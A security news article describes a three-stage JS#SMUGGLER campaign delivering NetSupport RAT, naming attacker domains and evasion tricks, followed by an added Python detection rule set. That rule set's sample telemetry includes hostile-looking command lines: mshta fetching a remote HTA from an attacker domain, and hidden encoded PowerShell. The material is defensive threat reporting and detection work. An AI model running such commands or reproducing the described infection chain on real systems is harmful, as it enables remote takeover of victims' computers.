New Multi-stage JS#SMUGGLER Malware Attack Delivers ‘NetSupport RAT’ to Gain Full System Control

A new malware campaign using multiple attack stages has been discovered that delivers NetSupport RAT through hidden web-based redirects and obfuscated code.

The attack unfolds in three stages, starting with a JavaScript loader injected into compromised websites.

This first stage downloads a stealthy HTA file that runs encrypted PowerShell commands using mshta.exe. The final stage then downloads and installs a remote access tool that gives attackers complete control over victim computers.

The attack chain employs advanced techniques to evade detection by security software.

Securonix security researchers identified this campaign and found that it uses multiple layers of obfuscation, including numeric index mapping and rotating arrays to hide malicious code.

The campaign also checks the device type the victim is using and delivers different payloads to mobile versus desktop users. The researchers noted that the malware framework appears to be actively maintained and optimized for staying hidden on infected systems.

Once the JavaScript loader runs in the victim’s browser, it quietly sets up rotating arrays of scrambled text and waits for the webpage to load fully.

It then checks the device type, and either creates a full-screen, hidden iframe for mobile devices or loads a remote script for desktop systems.

The loader also uses the browser’s local storage to track whether it has already infected that system, ensuring it only runs once to reduce the chances of being detected.

This careful approach allows attackers to build malicious web addresses on the fly and fetch the next stage of the attack from domains they control, such as stoneandjon.com and boriver.com.

Attack Chain and Infection Mechanism

The second stage arrives as an HTML Application file that runs through mshta.exe, a legitimate Windows program that attackers often abuse.

This HTA file runs completely hidden from view, writing an encrypted PowerShell script to the computer’s temporary folder.

The script uses AES-256-ECB encryption, Base64 encoding, and GZIP compression to mask its true purpose.

Once the layers of encryption are removed, the payload executes directly in the computer’s memory without writing files to disk.

This technique makes it much harder for antivirus programs to detect the malware, as there are no suspicious files to scan.

After execution, the script removes its temporary files to hide evidence of the attack.

The final PowerShell payload downloads a ZIP file containing NetSupport RAT components from an attacker-controlled server at kindstki.com.

Obfuscated JavaScript (phone.js) (Source - Securonix)

After downloading the archive, the script extracts it into a folder named CommunicationLayer under ProgramData, a location that looks innocent and blends in with legitimate applications.

The malware launches the extracted client32.exe file using a hidden JScript wrapper to disguise the execution chain.

De-Obfuscated JavaScript using CyberChef tool (Source - Securonix)

To maintain long-term access, it creates a shortcut file called WindowsUpdate.lnk in the Startup folder.

This shortcut ensures the remote access tool launches automatically whenever the victim logs in to their computer, giving attackers persistent control.

IIFEs function and Numeric index-based lookup function Expressions (Source - Securonix)

NetSupport RAT provides complete remote access to the infected system, including desktop control, file operations, command execution, data theft, and tunneling.

The malware avoids requiring administrator privileges by installing at the user level and using deceptive naming to blend in with legitimate Windows components.

Organizations should strengthen their defenses by blocking untrusted scripts, enabling PowerShell logging, restricting mshta.exe execution, and deploying behavioral detection tools that can identify suspicious process chains and fileless execution techniques.
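As an added illustration of the process-chain detection recommended above (this is not code from Securonix or from the article), the following Python rule set tags Sysmon-style events that match the chain described in this report. The event layout, the DECODE_HINTS heuristic and the sample telemetry are constructed assumptions; the process names, file paths and domains are the ones named in the article.

```python
import re
from dataclasses import dataclass

# Indicators taken from the campaign description; DECODE_HINTS is a heuristic.
MSHTA = re.compile(r"\\mshta\.exe$", re.I)
POWERSHELL = re.compile(r"\\powershell\.exe$", re.I)
RAT_CLIENT = re.compile(r"\\ProgramData\\CommunicationLayer\\client32\.exe$", re.I)
STARTUP_LNK = re.compile(r"\\Startup\\WindowsUpdate\.lnk$", re.I)
DECODE_HINTS = re.compile(r"-enc|FromBase64String|GZipStream", re.I)
C2_DOMAINS = ("stoneandjon.com", "boriver.com", "kindstki.com")

@dataclass
class Event:
    kind: str          # "process" (creation) or "file" (write)
    image: str         # executable launched, or file path written
    parent: str = ""   # parent image, process events only
    cmdline: str = ""  # command line, process events only

def classify(ev: Event) -> list[str]:
    """Return the campaign behaviours one event matches (empty list if none)."""
    hits = []
    if ev.kind == "process":
        if MSHTA.search(ev.parent) and POWERSHELL.search(ev.image):
            hits.append("mshta-spawns-powershell")
        if POWERSHELL.search(ev.image) and DECODE_HINTS.search(ev.cmdline):
            hits.append("encoded-powershell-payload")
        if RAT_CLIENT.search(ev.image):
            hits.append("netsupport-client-in-programdata")
        if any(d in ev.cmdline.lower() for d in C2_DOMAINS):
            hits.append("known-campaign-domain")
    elif ev.kind == "file" and STARTUP_LNK.search(ev.image):
        hits.append("startup-lnk-persistence")
    return hits

def scan(events: list[Event]) -> dict[int, list[str]]:
    """Map event index -> matched behaviours, keeping only events that matched."""
    return {i: h for i, e in enumerate(events) if (h := classify(e))}

# Constructed sample telemetry (not real logs); the paths mirror the chain above.
SAMPLE = [
    Event("process", r"C:\Windows\System32\mshta.exe", r"C:\Program Files\Firefox\firefox.exe",
          "mshta.exe https://boriver.com/stage2.hta"),
    Event("process", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          r"C:\Windows\System32\mshta.exe", "powershell.exe -w hidden -enc ..."),
    Event("process", r"C:\ProgramData\CommunicationLayer\client32.exe",
          r"C:\Windows\System32\wscript.exe", "client32.exe"),
    Event("file", r"C:\Users\u\...\Start Menu\Programs\Startup\WindowsUpdate.lnk"),
    Event("process", r"C:\Windows\explorer.exe", r"C:\Windows\System32\userinit.exe", "explorer.exe"),
]
```

Feeding real process-creation and file-write events into `scan` in the same shape gives a per-event list of matched behaviours; a single host showing several of these tags in sequence is the chain the article describes.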
